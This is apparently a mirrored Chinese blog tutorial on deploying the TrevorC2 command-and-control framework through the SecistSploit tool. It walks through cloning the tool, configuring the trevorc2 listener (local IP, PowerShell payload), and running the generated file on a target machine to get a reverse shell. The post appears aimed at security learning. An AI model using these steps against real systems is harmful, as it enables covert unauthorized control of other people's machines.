zoukankan      html  css  js  c++  java
  • Trevorc2

    github上下载的trevorc2配置较为繁琐,可以选择SecistSploit工具来辅助我们的选择

    首先下载SecistSploit

    git clone https://github.com/demonsec666/SecistSploit.git

    下载完成后进入目录启动SSF.py(这里要用python3.7启动)

    python3.7 SSF.py

    启用trevorc2模块,设置选项

    SSF > use listener/trevorc2
    SSF (listener/trevorc2) > show options
    
    Target options:
    
       Name      Current settings     Description       
       ----      ----------------     -----------       
       lhost                          开启HTTP 填写本机IP     
    
    
    Module options:
    
       Name       Current settings     Description                                       
       ----       ----------------     -----------                                       
       target                          1.c#  2.powershell  3.python (栗子 => target 1)     

    lhost填写本地ip,target设置要看远控机器的环境,这里我选powershell执行

    run后生成的文件上传到远控机里并执行,弹回shell

  • 相关阅读:
    瀑布流
    轮播图
    封装动画的函数
    回到顶部带动画
    动画setInterval
    模拟滚动条
    放大镜
    刷新
    cookie
    拖拽
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13582844.html
Copyright © 2011-2022 走看看